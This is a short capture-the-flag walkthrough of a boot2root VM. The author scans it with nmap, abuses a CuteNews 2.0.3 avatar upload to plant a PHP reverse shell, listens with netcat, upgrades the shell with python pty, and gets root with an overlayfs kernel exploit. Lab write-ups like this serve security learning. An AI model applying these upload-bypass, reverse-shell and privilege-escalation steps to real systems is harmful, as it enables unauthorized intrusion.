This VM it’s a really easy boot2root challenge. I pwned it in 5 minutes, let’s start!
I scanned all available services with nmap:
nmap 192.168.1.20 -sV
The output is:
Starting Nmap 7.25BETA2 ( https://nmap.org ) at 2016-09-15 19:09 CEST Nmap scan report for 192.168.1.20 Host is up (0.0021s latency). Not shown: 999 closed ports PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.7 ((Ubuntu)) Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 7.29 seconds
So there is only a website here. I opened it and I have a login form in front of me. The server is running CuteNews v.2.0.3 and after some research I found an arbitrary file upload vulnerability here. So I just registered a new user (testuser in this case) and I logged in. Then I clicked on “Personal Options”. Now I started Burp Suite and I activated the proxy interception. Then I downloaded this shell and I edited the first 2 lines with my local IP and listening port. Then i renamed it with a .jpg extension and I clicked “Browse…”, I selected the file and I pressed “Save Changes”. Now I edited the POST request into Burp Suite changing the extension to .php, I forwarded the request and the file was uploaded! Now I started listen locally:
nc -lvp 1234
Now I browsed to http://192.168.1.20/uploads/avatar_testuser_php-reverse-shell.php and I got the reverse shell without TTY. To achieve this I just used python:
python -c 'import pty; pty.spawn("/bin/bash")'
Now I need to escalate privileges. I started checking the kernel version:
The output is:
Linux simple 3.16.0-30-generic #40~14.04.1-Ubuntu SMP Thu Jan 15 17:45:15 UTC 2015 i686 i686 i686 GNU/Linux
I checked online the kernel version and I discoverd that it was vulnerable to overlayfs exploit. So I browsed to /tmp and I typed:
Then I gave it execution permissions:
chmod +x ofs_32
And now I just executed it:
I got a shell as root! I res-spawned a TTY shell with python and I browsed to /root and I listed files and I found flag.txt. I just opened it:
U wyn teh Interwebs!!1eleven11!!1! Hack the planet!
The VM is rooted and completed!